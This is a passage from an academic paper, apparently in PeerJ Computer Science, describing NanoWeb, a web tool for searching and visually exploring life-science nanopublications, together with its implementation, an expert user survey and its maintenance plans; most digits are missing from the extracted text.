https://peerj.com/computer-science/ —zoom in/out: using the mouse wheel, the user can zoom in or out on the nanopublication graph. —switch between graph and information layers: a button is provided to switch between graph and information layers. for instance, when the graph layer is displayed to go back to the information layer, the user can click on the show nanopub info button (fig. . ). in the same way, when the information layer is displayed, the user can switch to the graph layer by clicking the show graph layer button. —rearrange layers: the navbar menu manages layers disposition (fig. . ) and it is provided with the following buttons: . nanopub list only: it shows a full-screen view of just the nanopublications list layer. . display both: it opens a two-layers view consisting of the nanopublications list layer and the currently active layer between graph and information layers. for instance, fig. shows the graph layer on the right side of the nanopublications list layer. . graph only/nanopub info only: it shows a full-screen view of the current layer, which can be the graph layer or the information layer. for instance, fig. shows this button with the text “graph only”, since the graph layer is active. graph exploration figure shows a multi-level graph exploration for the nanopublication with the title mutl homolog —colorectal carcinoma, which describes a gene-disease association. this functionality allows the user to explore the relation network of the considered nanopublications. besides, the graph exploration allows the user to understand how and why different nanopublications are connected. there is no limit to the depth of the exploration, that is, to the graph’s dimension visualized. the user can potentially expand the graph at will until all the nodes connected in the relation network are displayed. in this way, the synthesis power of nanopublications is enhanced by the value of the relation network; it provides a greater information contribution than the sum of the single nanopublications taken separately. since the graph can have a high density of connections, only a portion of the connected nodes is shown for a new graph expansion request. however, the user could be interested in a specific connection between two nodes, which may not be shown by default. hence, it is possible to search for specific connections directly on the nanopublication semantic network—we call this functionality “connected entities search”. figure shows the connected entities search in action. in particular, we see the entities connected to the mutl homolog gene. when the user right-clicks on the node associated with the mutl homolog gene, the information window is shown on the right side. inside the information window, there is the “connected entities” input field, where the user can specify the entity name s/he is looking for. for instance, when the user types polyposis, a list of matching entities appear, and the user can choose which entities to add to the graph by clicking on the plus button. using the connected entities search, users can quickly verify whether a direct link between two nodes exists. the “connected entities search” is provided with auto-completion to ease the work of the user. giachelle et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ implementation specifications nanoweb back-end is developed using django (https://www.djangoproject.com/), which is a python-based free and open-source web framework. 
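before turning to the front-end implementation details, the following sketch illustrates the idea behind the graph exploration and "connected entities search" functions described above. it assumes a plain rdflib graph whose entities carry rdfs:label literals; it is not the nanoweb implementation, which works against its own databases and user interface.

```python
# Illustrative sketch only (assumption: an rdflib Graph with rdfs:label annotations).
from rdflib import Graph, URIRef
from rdflib.namespace import RDFS

def connected_entities(g: Graph, node: URIRef, name_prefix: str):
    """Return neighbours of `node` whose label starts with `name_prefix` (auto-completion-like lookup)."""
    matches = []
    neighbours = set(g.objects(node, None)) | set(g.subjects(None, node))
    for n in neighbours:
        for label in g.objects(n, RDFS.label):
            if str(label).lower().startswith(name_prefix.lower()):
                matches.append((n, str(label)))
    return matches

def directly_linked(g: Graph, a: URIRef, b: URIRef) -> bool:
    """Check whether a direct edge exists between two nodes, in either direction."""
    return (a, None, b) in g or (b, None, a) in g
```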
the web app front-end is developed using html , css , bootstrap framework (https://getbootstrap.com/), javascript, jquery (https://jquery.com/) and the library d .js. (https://d js.org/). in particular, to draw the nanopublication graphs, we used the d force layout, (https://d -wiki.readthedocs.io/zh_cn/master/force-layout/) which is specifically designed to implement force-directed graphs. a force-directed graph is a graph where nodes are subjected to forces of two types: attractive and repulsive. these kinds of forces try to simulate physics scenarios where particles attract or repel each other. here, the particles are the nodes of the graph, and the edges represent the presence of forces between nodes. when a new instance of a force-directed layout is created, a new d simulation starts, and the nodes become subjected to forces. the force-directed layout can be used both for cyclic and acyclic graphs, which can be either directed or not. to implement the graph exploration, we developed a custom, collapsible force-directed layout where nodes can be expanded or collapsed at will. this layout enables a user- friendly exploration of graphs leveraging on a functional disposition of children nodes around the parents. in particular, fig. shows that children nodes are displayed around parents at evenly spaced angles of an arc. this disposition is designed to facilitate the horizontal figure nanoweb search interface with user-provided query: colorectal cancer. full-size doi: . /peerj-cs. /fig- giachelle et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://www.djangoproject.com/ https://getbootstrap.com/ https://jquery.com/ https://d js.org/ https://d -wiki.readthedocs.io/zh_cn/master/force-layout/ http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ expansion of the graph and prevent nodes from overlapping in a multi-level expansion. the custom force-directed layout developed and the nanoweb code are publicly available (https://github.com/giachell/nanoweb). advanced search in addition to keyword search, we introduced the advanced search to guide users in query formulation. the advanced search is based on structured terms that can be general purpose (e.g., nanopublication urls, author orcid and scientific evidence identifiers) or figure information layer for the nanopublication. full-size doi: . /peerj-cs. /fig- giachelle et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://github.com/giachell/nanoweb http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ domain-specific (e.g., genes, diseases, proteins and tissues). figure shows one of the configurations available in the advanced search interface. the interface is based on filters enabling the users to perform boolean search and restrict the search results. users can choose the search modality in the search by drop-down menu, marked with number one in fig. . the interface provides four different search modalities: . topic: topic-based search is domain-specific, and it allows the user to find nanopublications for a specific topic. currently, the available topics are genes, diseases, proteins, and tissues. the user can specify the chosen topic in the choose topic drop- down menu, indicated with number two in fig. . the user can also specify the name of the entity that s/he is looking for in the entity name input field, marked with number three in fig. . for instance, in fig. 
the chosen topic is gene and the gene name is mutl homolog . since gene and protein names could be quite complex to remember, the entity name input field is provided with and auto-completion functionality. once the user specifies the details about the topic, the list of related nanopublications is returned, so that the user can visualize and explore them as described for the keyword search interface. . author: allows the user to find all the nanopublications related to a nanopublication/ evidence author. the provided author could be a nanopublication author or the author figure data record for the nanopublication with title: mutl homolog —colorectal carcinoma. full-size doi: . /peerj-cs. /fig- giachelle et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ of the scientific publications containing the evidence of nanopublication assertions. users can search for a specific author by providing the author’s name or her/his orcid identifier. the author input field is provided with auto-completion for both author names and orcid identifiers. . nanopublication id: using this mode, users can search for a specific nanopublication via its identifier/url. the users can take advantage of the auto-completion feature to search for all the nanopublications. . evidence: this mode allows the users to get all the nanopublications extracted from a given scientific publication (i.e., evidence) starting from the publication doi or pubmed url (e.g., http://identifiers.org/pubmed/ ). to define the advanced search interface filters we used structured terms (entities) collected from several public ontologies, databases and terminology resources concerning both life science and medical domains. for instance, we consider genes, diseases, proteins and tissues categories that users can use as filters. the machine-readable versions of the entities are contained in the nanopublications indexed by nanoweb. to obtain their human-readable version, we leverage on public ontologies and databases. from these resources the associated labels are extracted, stored into the nanoweb database and then linked to the respective machine-readable entities. to do so, we used some ontologies: basic formal ontology (bfo) (https://basic-formal-ontology.org/), chemical entities of biological interest ontology (chebi) (https://www.ebi.ac.uk/chebi/), evidence and conclusion ontology (eco) (https://www.evidenceontology.org/), open biological and biomedical ontology (obo) (http://www.obofoundry.org/), pathway ontology (pw) (https://rgd.mcw.edu/rgdweb/ontology/search.html). semanticscience integrated ontology (sio) (https://github.com/maastrichtu-ids/semanticscience), sequence ontology (so) (http://www.sequenceontology.org/). additionally, as terminology resources we employed the national center for biotechnology information (ncbi) (https://www.ncbi.nlm.nih.gov/ ), national cancer institute thesaurus (ncit) (https://ncit.nci.nih.gov/ncitbrowser/) and the unified medical language system (umls) (https://www.nlm.nih.gov/research/ umls/index.html). the entities extracted from the resources mentioned above are also used for the mapping of nanopublication assertions—originally modeled as machine-readable rdf statements—into a human-readable form. to do so, nanoweb exploits the entity types to determine the proper visual representation of nanopublication assertions. 
for instance, in the case of a disgenet gene-disease association (dgn-gda), the entity types are gene or disease. the entities are represented as nodes labeled with the human- readable versions of the corresponding uri used in the rdf serialization of the nanopublication. the nodes are connected together by an oriented edge from gene to disease. as an example let us consider the assertion of the nanopublication with identifier: ra wlhsgfzrdu kulrsa_pta gk -mwadaj-lz kaqpog: miriam −gene : a ncit : c . l l d : c a ncit : c . giachelle et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://identifiers.org/pubmed/ https://basic-formal-ontology.org/ https://www.ebi.ac.uk/chebi/ https://www.evidenceontology.org/ http://www.obofoundry.org/ https://rgd.mcw.edu/rgdweb/ontology/search.html https://github.com/maastrichtu-ids/semanticscience http://www.sequenceontology.org/ https://www.ncbi.nlm.nih.gov/ https://ncit.nci.nih.gov/ncitbrowser/ https://www.nlm.nih.gov/research/umls/index.html https://www.nlm.nih.gov/research/umls/index.html http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ dgn−gda : dgna c d a e f f f d sio : sio_ miriam −gene : , lld : c ; a sio : sio_ . the assertion describes a gene-disease association (dgn-gda) between the ncbi gene amyloid beta precursor protein (miriam-gene: ) and the alzheimer’s disease (lld: c ). the association type is more specifically a gene-disease biomarker association (sio: ). nanoweb enriches the entities with additional information that can figure graph layer for the nanopublication clicked by the user. full-size doi: . /peerj-cs. /fig- giachelle et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ be inferred from the rdf graph of the nanopublication. for instance, additional information are the types of the entities—for example, the fact that first entity (miriam- gene: ) is a gene (ncit:c ) and that (lld:c ) is a disease (ncit:c ). all these additional information are treated as entity properties that the user can access via the interactive visual representation of the nanopublication. the entity labels amyloid beta precursor protein and alzheimer’s disease are taken respectively from the ncbi and linked life data platforms. the entity labels are resolved from entity identifiers by relying on public api endpoints such as the entrez programming utilities (e-utilities) figure graph exploration: search for mutl homolog (mlh ) connected entities. full-size doi: . /peerj-cs. /fig- figure graph exploration: the information window for muts homolog —carcinogenesis is displayed as a result for the user click on the edge. full-size doi: . /peerj-cs. /fig- giachelle et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ (https://www.ncbi.nlm.nih.gov/books/nbk /) provided by ncbi. nanopublications from the same platform (e.g., disgenet, nextprot, protein atlas, and wikipathways) use the same authorities to identify entities (e.g., genes, diseases, proteins and tissues). however, when nanopublications from different platforms are visualized, it is sometimes necessary to reconcile different resource identifiers across authorities to link the same entities to others using different identifiers. 
in the visual representation only one valid identifier is presented for each entity to keep the interface as clean as possible. expert users survey to better understand the needs of the nanopublication community and improve the critical functionalities of nanoweb, we conducted an expert users survey to collect feedback from nanopublication and domain experts. we advertised nanoweb on the nanopublication public mailing lists, on social media targeting the potentially interested communities and private emails to the authors of papers about nanopublications. we asked the nanopublication experts involved in the survey to use nanoweb, and then to answer a questionnaire. it should be noticed that we did not provide any tutorial to inform the users about nanoweb functions because we also wanted to investigate how intuitive the system is for first-time users and how steep its learning curve is. the survey was composed of sixteen questions (q( – )) divided in four sections. the majority of the questions is answered through the likert five-point scale, ranging from to points, meaning different things depending on the question. figure advanced search: search for nanopublications regarding the mutl homolog gene. full-size doi: . /peerj-cs. /fig- giachelle et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://www.ncbi.nlm.nih.gov/books/nbk / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ . personal information. this section is composed of four questions and collects basic information about the participants and their experience with nanopublications: � q : do you have any experience with nanopublications? in this case the answer with point in the likert scale means: “not at all” (i.e., i heard someone mentioning nanopublications once), while the points one means: “quite a lot” (i.e., i created some nanopublications myself) � q : current position? single choice between: academic, industry, master student, phd student, postdoc. � q : primary domain of expertise? multiple choices between: art and architecture, biology, chemistry, communication science, computers and the humanities, computer science, economics, life science, linguistics, mathematics, medicine, physics, psychology, sociology. the survey considered fourteen participants in total, counting seven highly-experienced users ( on the likert scale) and nine experienced users ( on the likert scale). according to the data collected, the majority of the participants ( . %) are from academia. also, according to q , the main domains of expertise of the participants are: computer science ( . %), chemistry ( . %), life science ( . %), biology ( . %), medicine ( . %). computer science indicates experts in the creation of nanopublications from the technical viewpoint, whereas the others are domain experts who might curate or use nanopublications in their daily work. . the relevance of the addressed problem. this section explores the existence and quality of other services enabling search, access, exploration, and re-use of nanopublications (all questions are answered according to a (not at all) to (quite a lot) likert scale): � q : is searching, accessing, and consulting nanopublications relevant for the stakeholders (e.g., researchers, developers, domain experts)? � q : to the best of your knowledge, are the currently available tools and services adequate for searching and accessing nanopublications? 
� q : to the best of your knowledge, do other tools and services offer interactive visualizations to interact with nanopublications? � q : to the best of your knowledge, do other available tools and services offer visual exploration possibilities of the nanopublication relation network? according to the data collected for questions q( – ), the majority of the participants ( %) considers the problem addressed by nanoweb relevant or very relevant, pointing out the lack of other tools and services for the interactive visualization and exploration of nanopublications and their relation network. about q , % of the participants consider the currently available tools and services for searching and accessing nanopublications inadequate ( or points on the likert scale) and % are not enthusiastic about them ( points on the likert scale). % of the giachelle et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ participants answered that there are no other available tools offering interactive visualizations of nanopublications and % say there are no alternative tools to visually explore the nanopublication network . from these answers, we can see that the participants confirm our analysis highlighting the lack of intuitive and visual tools for the access and exploration of the nanopublications despite the confirmed utility of searching and accessing nanopublications for the stakeholders. . nanoweb—search engine and interface. the questions of this section are designed to evaluate the search capabilities of nanoweb and the usability of its interface. this section was answered by twelve participants over fourteen. � q : is nanoweb search interface intuitive and easy-to-use? � q : is nanoweb capable of retrieving relevant nanopublications for a given query? � q : in your opinion, is a search based on keywords an effective way to seek for nanopublications? � q( – ): in your opinion, for the not technologically savvy, what is the most effective way to search nanopublications? q and q are the same, but the answers are different since for q the range of answers is from : sparql end-point to : keyword-based search; whereas, for q the range is from : faceted search to : keyword search. � q : will nanoweb enhance the productivity of involved stakeholders (researchers, developers, nanopublication experts)? about question q , the majority of the participants consider nanoweb search interface intuitive and easy-to-use ( % answered or above and none answered below ). there is no accordance instead for q (median = , mean = . , std = . ), % of the participants answered which means “not sure” and the rest of them is divided into the two other classes “not really” (≤ : %) and “quite a lot” (≥ : %). one reason that could motivate this kind of distribution might be that participants did not know what they could search in advance, thus many user queries might have not produced the expected results. to address this issue, after the survey we introduced the advanced search which guides users on nanoweb search capabilities. participants are well-distributed for q (median = , mean = . , std = . ), there is not a preferred opinion about keyword search; nevertheless, % of the participants consider the search based on keywords quite an effective or highly effective (answer or above) way to seek for nanopublications. 
about q( – ), the majority of the participants ( %) consider that keyword-based search is more effective than sparql end-point but less effective than faceted search ( %) for the non-technologically savvy. this answer shows how domain experts are more accustomed to use faceted search rather than keyword search for searching structured data as nanopublications are. keyword search is considered useful, but it should not substitute faceted search as a means to access rdf scientific data. finally, all the participants believe nanoweb can moderately ( %) or substantially ( %) enhance the productivity of researchers and nanopublication experts. giachelle et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ . nanoweb—visual exploration. this section of the questionnaire evaluates the experience with the nanoweb user interface for visual exploration of nanopublications. we designed the questions of this section to investigate whether the visual exploration of nanopublication graphs could lead to the discovery of meaningful relationships and information potentially unknown to the experts. moreover, we asked the participants to compare nanoweb with the currently available alternative tools. this section consists of three questions: � q : do you feel comfortable with the interface for the visual exploration? � q : could the visual exploration of the nanopublication graphs lead to the discovery of meaningful relationships and information not known in advance? � q : is nanoweb visual exploration innovative with respect to the currently available alternative tools and techniques? with reference to q , the majority ( %) of the participants felt very comfortable with the interface for the visual exploration and only % gave a score below three points. moreover, % of the participants believe the visual exploration of the nanopublication graphs could lead to the discovery of meaningful relationships and information not known in advance . finally, half of the participants think that nanoweb is highly innovative (four or five points) with respect to the state of the art, while only % thinks it is only marginally innovative. user feedback finally, we asked the participants to provide some feedback and suggestions to improve nanoweb. the feedback collected shows that users have appreciated the system: � “i very much appreciate the tool, and i think it can be a great push for better accessing and using nanopublications by everyone!” � “i consider the nanoweb proposal a smart insight for searching nanopublications.” we also received useful suggestions to improve the system: � “i found the visual exploration innovative, but i think it could be improved by a better ui/ux.” � “good work! i would suggest that you enable url-based searching.” � “consider replacement of keyword search with a concept-based search. this can also be used to enable auto-suggest functionality based on the resources (genes, diseases, etc)” � “i really like the application, but at the end of the day it is dependent on the indexed data. it would be great if there were a possibility to suggest datasets to be included or even better, to be able to add them myself!” � “downloading of the results as a dataset of nanopublications would be most welcome too. even better, a cytoscape plugin that allows me to pull in the full network. i’m looking forward to seeing where you are taking this. success!” giachelle et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . 
we consider the user feedback of great value, so we decided to improve nanoweb according to the received suggestions. firstly, we improved both the user interface and experience (ui/ux), providing a responsive mobile device layout. then, we improved the search system so that a user can perform url-based searching. currently, nanoweb allows the users to find the authors from their orcid ids; a specific nanopublication from its url/identifier; and all the nanopublications related to one particular evidence paper, provided its doi. the prominent feature we added to nanoweb, thanks to the user feedback, is the advanced search, as described in "nanoweb graphical user interface". the advanced search interface is based on structured terms extracted from the life science domain; it enables users to search for nanopublications based on topics (e.g., genes, diseases, proteins, etc.), scientific evidence, and authors. finally, based on the collected feedback, we planned several further improvements to the system that we discuss as future work in "conclusions".

discussion on maintaining aspects nanoweb aims to provide users unified access to nanopublications and to search and explore them through a human-readable interface. since nanoweb is tailored for both the life science and medical domains, it is designed to help the experts of these domains in their research work. it also allows users who do not have prior knowledge about nanopublications to easily interpret and understand the returned content. several challenges need to be addressed to maintain a stable, citable system such as nanoweb aims to be. the major maintenance challenges are:

. ensure persistent access and re-use of data: to guarantee persistent and reliable access to data and avoid broken urls, nanoweb uses persistent urls and identifiers to refer to resources. all the indexed nanopublications are directly accessible through a persistent url provided by the w3c permanent identifier community group (https://w3id.org/). the nanopublication's persistent url format is http://w3id.org/nanoweb/landingpage/<id>, where the id in brackets is the nanopublication identifier and satisfies the regular expression ^ra[a-za-z - _\-]{ }$. nanopublications use persistent identifiers, which allow them to be accessed across different providers. even if one of the several nanopublication providers is unreachable at a given moment, the others can provide access by using the same identifiers. as for nanopublications, nanoweb itself is reachable through the persistent url http://w3id.org/nanoweb/.

. long-term preservation of resources: all information concerning nanopublications is saved in the nanoweb databases, which are stored on network hard drives using redundancy policies such as redundant array of independent disks (raid). the adopted redundancy policies and daily back-up routines are designed to prevent loss of data and ensure long-term preservation.

. ongoing hosting: nanoweb is hosted within the cloud architecture of the university of padova. the institutional cloud architecture and network infrastructure provide a reliable connection service as well as a protection layer from external attacks.
a team of system administrators actively controls the cloud/network infrastructure and supports nanoweb. nanoweb is developed in the context of the european project examode, which guarantees financial support until . within the project there are sustainability policies that should guarantee the maintenance of the developed tools well beyond the termination of the project.

conclusions scientific and scholarly communications are growing at an incredible speed, and it is hardly possible to keep track of the discoveries and statements presented in the literature, even considering only a specific domain. moreover, the "redundancy of statements in multiple fora makes it difficult to identify attribution, quality, and provenance" (groth, gibson & velterop, ). hence, the nanopublication model has been proposed to quickly identify, search, and access scientific facts extracted from papers. nanopublications are represented as graphs centered on a scientific statement (i.e., the assertion), which make provenance, attribution, and scientific information machine-readable. nanopublications are concise, noise-free resources characterized by high information density. leveraging the semantic-oriented rdf structure, nanopublications efficiently convey information and concepts. hence, these features make nanopublications particularly suitable for enabling data search, information extraction, and automatic reasoning over scientific facts. despite the promising features of nanopublications, their use is still restricted to highly-specialized scientific circles. the central limitation to the full exploitation of nanopublications is the lack of services enabling their search, access, exploration, and re-use. search is limited to the use of structured query languages such as sparql, and a service to search over all the publicly available nanopublications at once is not available. nanopublications are machine-readable, but no human-readable counterpart is generated and open to the public. nanopublications create a vast relation network of scientific facts that could lead to discoveries, but up to now, there are no automatic or manual services enabling graph exploration. the goal of this work is to provide unified access to life science nanopublications in order to allow users to search, access, explore, and re-use them on the web. to this end, we have designed and developed a web application called nanoweb, which allows the users to (i) search for domain-specific nanopublications using keywords (as they are accustomed to do with web search engines); (ii) explore their relation network to discover new nanopublications and meaningful connections; (iii) access and understand their content; (iv) connect to the evidence paper and access the related data record in external curated scientific databases; and (v) easily cite nanopublications when they are re-used in new scientific contexts. we also presented the benefits of the serendipity-oriented perspective enabled by nanoweb in the life science domain. we showed how the exploration of nanopublication graphs could enrich domain knowledge and point out interesting gene-disease connections. as future work, we plan to extend the system by providing the user with the capability of exploring a new graph generated from an arbitrary set of life science nanopublications selected by the user.
this functionality represents a significant improvement for the graph exploration since the initial relation network already considers different nanopublications, instead of starting the graph exploration from a single one. in this way it is possible to highlight, for instance, the set of common diseases due to a selection of genes or, conversely, the set of common genes that cause the disease of interest. moreover, we plan to crawl and index the life science nanopublications that are not currently available on the web, if not downloading large archive files which are hardly usable. as future work, we plan to further improve nanoweb according to the expert users survey’s feedback. we will allow the users to add datasets or other domain-specific nanopublication sources to be crawled and indexed by the system. we will add the possibility to select and download custom-made sets of nanopublications. we will propose a customized user experience to save lists of favorite nanopublications, entities, and associations and notify when something new is published. we will dedicate a fair amount of work to the extension of search functionalities to improve keyword search and to include faceted search which is required by the stakeholders. indeed, faceted search is commonly adopted solution (arenas et al., ) to search rdf data. a faceted search is particularly useful when it is applied to domain- specific data. for instance, in gene-disease associations, the faceted search can be used to search for specific genes or specific diseases, filtering out all the entities not relevant to the search. faceted search can be associated with auto-completion functionalities to ease the users’ work. finally, we plan to improve keyword-based searches with ontology and database id lookups. acknowledgements the authors wish to thank erika fabris for the work on the citation of nanopublications and the development of some apis used in this work. additional information and declarations funding this work was supported by the computational data citation (cdc-stars) project of the university of padua, and by the examode project, as a part of the european union horizon program under grant . there was no additional external funding received for this study. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: european union horizon program: . giachelle et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ competing interests the authors declare that they have no competing interests. author contributions � fabio giachelle conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. � dennis dosso performed the computation work, authored or reviewed drafts of the paper, and approved the final draft. � gianmaria silvello conceived and designed the experiments, analyzed the data, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. data availability the following information was supplied regarding data availability: source code is available at github: https://github.com/giachell/nanoweb. the indexed nanopublications are also publicly available here: http://app.tkuhn. eculture.labs.vu.nl/nanopub-monitor/. 
references agrawal s, chaudhuri s, das g. . dbxplorer: a system for keyword-based search over relational databases. in: proceedings of the th international conference on data engineering, icde . ieee computer society, – . amith m, tao c. . representing vaccine misinformation using ontologies. journal of biomedical semantics ( ): doi . /s - - - . arenas m, cuenca grau b, kharlamov e, marciuška s, zheleznyakov d. . faceted search over rdf-based knowledge graphs. journal of web semantics - : – doi . /j.websem. . . . balmin a, hristidis v, koudas n, papakonstantinou y, srivastava d, wang t. . a system for keyword proximity search on xml databases. in: proceedings of th international conference on very large data bases, vldb. morgan kaufmann, – . bast h, buchhold b, haussmann h. . semantic search on text and knowledge bases. foundations and trends in information retrieval ( – ): – doi . / . bhalotia g, hulgeri a, nakhe c, chakrabarti s, sudarshan s. . keyword searching and browsing in databases using banks. in: proceedings of the th international conference on data engineering. ieee computer society, – . biryukov m, groues v, satagopam v, schneider r. . biokb-text mining and semantic technologies for biomedical content discovery. available at https://biokb.lcsb.uni.lu/. bizer c, heath t, berners-lee t. . linked data—the story so far. international journal on semantic web and information systems ( ): – . borgman cl. . big data, little data, no data. cambridge: mit press. campregher c, honeder c, chung h, carethers jm, gasche c. . mesalazine reduces mutations in transforming growth factor β receptor ii and activin type ii receptor by improvement of replication fidelity in mononucleotide repeats. clinical cancer research ( ): – . giachelle et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://github.com/giachell/nanoweb http://app.tkuhn.eculture.labs.vu.nl/nanopub-monitor/ http://app.tkuhn.eculture.labs.vu.nl/nanopub-monitor/ http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /j.websem. . . http://dx.doi.org/ . / https://biokb.lcsb.uni.lu/ http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ carroll jj, bizer c, hayes p, stickler p. . named graphs, provenance and trust. in: proceedings of the th international conference on world wide web. acm press, – . carroll jj, stickler p. . rdf triples in xml. in: proc. of the www, conference (alternate track papers & posters). acm press, – . chapman a, simperl e, koesten l, konstantinidis g, ibáñez ld, kacprzak e, groth p. . dataset search: a survey. vldb journal ( ): – doi . /s - - -x. cheney j, chiticariu l, tan w. . provenance in databases: why, how, and where. foundations and trends in databases ( ): – doi . / . chichester c, gaudet p, karch o, groth pt, lane l, bairoch a, mons b, loizou a. . querying nextprot nanopublications and their value for insights on sequence variants and tissue expression. journal of web semantics : – doi . /j.websem. . . . chichester c, karch o, gaudet p, lane l, mons b, bairoch a. . converting nextprot into linked data and nanopublications. semantic web ( ): – doi . /sw- . coffman j, weaver ac. . an empirical performance evaluation of relational keyword search techniques. ieee transactions on knowledge and data engineering ( ): – doi . /tkde. . . dosso d, silvello g. . search text to retrieve graphs: a scalable rdf keyword-based search system. ieee access : – doi . /access. . . elbassuoni s, blanco r. . keyword search over rdf graphsin: proc. 
of the th acm conference on information and knowledge management, cikm . new york: acm press, – . fabris e, kuhn t, silvello g. . a framework for citing nanopublications. in: doucet a, isaac a, golub k, aalberg t, jatowt a, eds. proc. of the rd international conference on theory and practice of digital libraries, tpdl , volume of lecture notes in computer science. berlin: springer, – . groth p, gibson a, velterop j. . the anatomy of a nanopublication. information services & use ( – ): – doi . /isu- - . hettne km, thompson m, van haagen h, van der horst e, kaliyaperumal r, mina e, tatum z, laros jfj, van mulligen em, schuemie m, aten e, li ts, bruskiewich r, good bm, su ai, kors ja, den dunnen j, van ommen gjb, roos m, ‘t hoen pa, mons b, schultes ea. . the implicitome: a resource for rationalizing gene-disease associations. plos one ( ): – . hey t, tansley s, tolle k. . the fourth paradigm: data-intensive scientific discovery. new york: microsoft research. kadilierakis g, fafalios p, papadakos p, tzitzikas y. . keyword search over rdf using document-centric information retrieval systems. in: the semantic web. cham: springer international publishing, – . kopliku a, pinel-sauvagnat k, boughanem m. . aggregated search: a new information retrieval paradigm. acm computing surveys (( ): )): – , doi . / . kuhn t, barbano pe, nagy ml, krauthammer m. . broadening the scope of nanopublications. in: proceedings of the semantic web: semantics and big data, th international conference, eswc , volume of lncs. berlin: springer, – . kuhn t, meroño-peñuela a, malic a, poelen jh, hurlbert ah, ortiz ec, furlong li, queralt- rosinach n, chichester c, banda jm, willighagen el, ehrhart f, evelo cta, malas tb, dumontier m. . nanopublications: a growing resource of provenance-centric scientific linked data. in: th ieee international conference on e-science, e-science . ieee computer society, – . giachelle et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /s - - -x http://dx.doi.org/ . / http://dx.doi.org/ . /j.websem. . . http://dx.doi.org/ . /sw- http://dx.doi.org/ . /tkde. . http://dx.doi.org/ . /access. . http://dx.doi.org/ . /isu- - http://dx.doi.org/ . / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ kuhn t, willighagen e, evelo c, queralt-rosinach n, centeno e, furlong li. . reliable granular references to changing linked data. in: d’amato c, fernandez m, tamma v, lecue f, cudré-mauroux p, sequeda j, lange c, heflin j, eds. the semantic web—iswc . cham: springer international publishing, – . lopez-veyna ji, sosa vjs, lópez-arévalo i. . a virtual document approach for keyword search in databases. in: data. setúbal: scitepress, – . luo y, wang w, lin x, zhou x, wang j, li k. . spark : top-k keyword query in relational databases. ieee transactions on knowledge and data engineering ( ): – doi . /tkde. . . mass y, sagiv y. . virtual documents and answer priors in keyword search over data graphs. in: proceeding of the workshops of the edbt/icdt, joint conference, volume of ceur workshop proceedings. mccusker jp, dumontier m, yan r, he s, dordick js, mcguinness dl. . finding melanoma drugs through a probabilistic knowledge graph. peerj computer science ( ):e doi . /peerj-cs. . mccusker j, rashid sm, agu n, bennett kp, mcguinness dl. . the whyis knowledge graph framework in action. in: proceeding of the iswc posters & demonstrations, industry and blue sky ideas tracks co-located with th international semantic web conference (iswc ), volume of ceur workshop proceedings. 
mons b, van haagen h, chichester c, hoen p-b, den dunnen jt, van ommen g, van mulligen e, singh b, hooft r, roos m, hammond j, kiesel b, giardine b, velterop j, groth p, schultes e. . the value of data. nature genetics ( ): – doi . /ng - . page r. . liberating links between datasets using lightweight data publishing: an example using plant names and the taxonomic literature. biodiversity data journal :e doi . /bdj. .e . piñero j, ramírez-anguita jm, saüch-pitarch j, ronzano f, centeno e, sanz f, furlong li. . the disgenet knowledge platform for disease genomics: update. nucleic acids research (d ):d –d . pontén f, jirström k, uhlen m. . the human protein atlas’a tool for pathology. journal of pathology ( ): – doi . /path. . pound j, mika p, zaragoza h. . ad-hoc object retrieval in the web of data. in: proceeding of the th international conference on world wide web, www . new york: acm press, – . pérez j, arenas m, gutierrez c. . semantics and complexity of sparql. acm transactions on database systems ( ): – . queralt-rosinach n, kuhn t, chichester c, dumontier m, sanz f, furlong li. . publishing disgenet as nanopublications. semantic web ( ): – doi . /sw- . rahman p, jiang l, nandi a. . evaluating interactive data systems. vldb journal ( ): – doi . /s - - - . robertson se, walker s, jones s, hancock-beaulieu mm, gatford m. . okapi at trec- . in: harman dk, ed. overview of the third text retrieval conference (trec- ). washington, d. c.: national institute of standards and technology, – . silvello g. . theory and practice of data citation. journal of the american society for information science and technology ( ): – . simitsis a, koutrika g, ioannidis ye. . précis: from unstructured keywords as queries to structured databases as answers. vldb journal ( ): – doi . /s - - - . giachelle et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /tkde. . http://dx.doi.org/ . /peerj-cs. http://dx.doi.org/ . /ng - http://dx.doi.org/ . /bdj. .e http://dx.doi.org/ . /path. http://dx.doi.org/ . /sw- http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /s - - - 